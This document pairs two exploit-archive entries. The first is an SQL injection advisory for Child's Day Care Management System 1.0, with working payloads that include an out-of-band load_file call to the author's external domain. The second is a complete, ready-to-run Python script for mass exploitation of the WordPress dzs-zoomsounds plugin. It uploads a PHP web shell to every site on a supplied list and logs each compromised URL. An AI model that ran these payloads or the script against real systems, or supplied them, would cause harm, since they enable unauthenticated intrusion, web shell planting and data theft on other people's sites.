<pre><code>## Title: Child's Day Care Management System 1.0 SQL - Injection<br />## Author: nu11secur1ty<br />## Date: 12.16.2021<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15085/childs-day-care-management-system-phpoop-free-source-code.html<br /><br /><br />## Description:<br />The `username` in Login.php app, parameter from Child's Day Care<br />Management System 1.0 appears to be vulnerable to SQL injection<br />attacks.<br />The payload '+(select<br />load_file('\\\\3ostdw78suah84gyykzz1k9b92fv3lrcu0mncb1.nu11secur1ty.net\\ztd'))+'<br />was submitted in the username parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed. Also, this system is vulnerable to<br />SQL-Injection-Bypass-Authentication<br />and XSS-Stored attacks. The attacker can be receiving all information<br />from the system by using these vulnerabilities! Status: CRITICAL<br /><br />[+] Payload:<br /><br />```mysql<br />---<br />Parameter: username (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=zCAMOHlX'+(select<br />load_file('\\\\3ostdw78suah84gyykzz1k9b92fv3lrcu0mncb1.nu11secur1ty.net\\ztd'))+''<br />AND (SELECT 1400 FROM (SELECT(SLEEP(5)))NgMD) AND<br />'wBYn'='wBYn&password=a6O!j4g!Z5<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/Child's-Day-Care-Management-System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/tvbuoi)<br /><br /><br />-- <br />System Administrator - Infrastructure Engineer<br />Penetration Testing Engineer<br />Exploit developer at https://packetstormsecurity.com/<br />https://cve.mitre.org/index.html and https://www.exploit-db.com/<br />home page: https://www.nu11secur1ty.com/<br />hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=<br /> nu11secur1ty <http://nu11secur1ty.com/><br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin dzs-zoomsounds - Remote Code Execution (RCE) (Unauthenticated)<br /># Google Dork: inurl:wp-content/plugins/dzs-zoomsounds<br /># Date: 16/02/2022<br /># Exploit Author: Overthinker1877 (1877 Team)<br /># Vendor Homepage: https://digitalzoomstudio.net/docs/wpzoomsounds/<br /># Version: 6.60<br /># Tested on: Windows / Linux<br /><br />import os<br />import requests<br />import threading<br />from multiprocessing.dummy import Pool,Lock<br />from bs4 import BeautifulSoup<br />import time<br />import smtplib,sys,ctypes<br />from random import choice<br />from colorama import Fore<br />from colorama import Style<br />from colorama import init<br />import re<br />import time<br />from time import sleep<br />init(autoreset=True)<br />fr = Fore.RED<br />gr = Fore.BLUE<br />fc = Fore.CYAN<br />fw = Fore.WHITE<br />fy = Fore.YELLOW<br />fg = Fore.GREEN<br />sd = Style.DIM<br />sn = Style.NORMAL<br />sb = Style.BRIGHT<br />Bad = 0<br />Good = 0<br />def Folder(directory):<br /> if not os.path.exists(directory):<br /> os.makedirs(directory)<br />Folder("exploited")<br />def clear():<br /> try:<br /> if os.name == 'nt':<br /> os.system('cls')<br /> else:<br /> os.system('clear')<br /> except:<br /> pass<br />def finder(i) :<br /> global Bad,Good<br /> head = {'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'}<br /> try :<br /> x = requests.session()<br /> listaa = ['/wp-content/plugins/dzs-zoomsounds/savepng.php?location=1877.php']<br /> for script in listaa :<br /> url = (i+"/"+script)<br /> while True :<br /> req_first = x.get(url, headers=head)<br /> if "error:http raw post data does not exist" in req_first.text :<br /> burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Connection": "close"}<br /> burp0_data = "<?php\r\nerror_reporting(0);\r\necho(base64_decode(\"T3ZlcnRoaW5rZXIxODc3Ijxmb3JtIG1ldGhvZD0nUE9TVCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+PGlucHV0IHR5cGU9J2ZpbGUnbmFtZT0nZicgLz48aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0ndXAnIC8+PC9mb3JtPiI=\"));\r\n@copy($_FILES['f']['tmp_name'],$_FILES['f']['name']);\r\necho(\"<a href=\".$_FILES['f']['name'].\">\".$_FILES['f']['name'].\"</a>\");\r\n?>"<br /> requests.post(url, headers=burp0_headers, data=burp0_data,timeout=45)<br /> urlx = (i+"/"+"/wp-content/plugins/dzs-zoomsounds/1877.php")<br /> req_second = x.get(urlx, headers=head)<br /> if "Overthinker1877" in req_second.text :<br /> Good = Good + 1<br /> print(fg+"Exploited "+fw+">> "+fg+" = "+urlx)<br /> with open("exploited/shell.txt","a") as file :<br /> file.write(urlx+"\n")<br /> file.close()<br /> else :<br /> Bad = Bad + 1<br /> print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Can't Exploit")<br /> else :<br /> Bad = Bad + 1<br /> print(fc+""+fw+"["+fr+"X"+fw+"] "+fr+" "+i+" "+fw+" <<< "+fr+" Not Vuln")<br /><br /> pass<br /> break<br /> except :<br /> pass<br /> if os.name == 'nt':<br /> ctypes.windll.kernel32.SetConsoleTitleW('1877Exploit | Exploited-{} | Not Vuln-{}'.format(Good, Bad))<br /> else :<br /> sys.stdout.write('\x1b]2; 1877Exploit | Exploited-{} | Not Vuln-{}\x07'.format(Good,Bad))<br /><br />def key_logo():<br /> clear = '\x1b[0m'<br /> colors = [36, 32, 34, 35, 31, 37]<br /> x = ' [ + ] OVERTHINKER1877 EXPLOIT'<br /> for N, line in enumerate(x.split('\n')):<br /> sys.stdout.write('\x1b[1;%dm%s%s\n' % (choice(colors), line, clear))<br /> time.sleep(0.05)<br /><br />def process(line):<br /> time.sleep(1)<br /><br /><br />def run() :<br /> key_logo()<br /> clear()<br /> print(""" <br /> [-] -----------------------------------------[-]<br /> [+] WwW.1877.TeaM<br /> [-] -----------------------------------------[-]<br /> \n \n""")<br /> file_name = input("Website List : ")<br /> op = open(file_name,'r').read().splitlines()<br /> TEXTList = [list.strip() for list in op]<br /> p = Pool(int(input('Thread : ')))<br /> p.map(finder, TEXTList)<br /><br />run()<br /> <br /><br /></code></pre>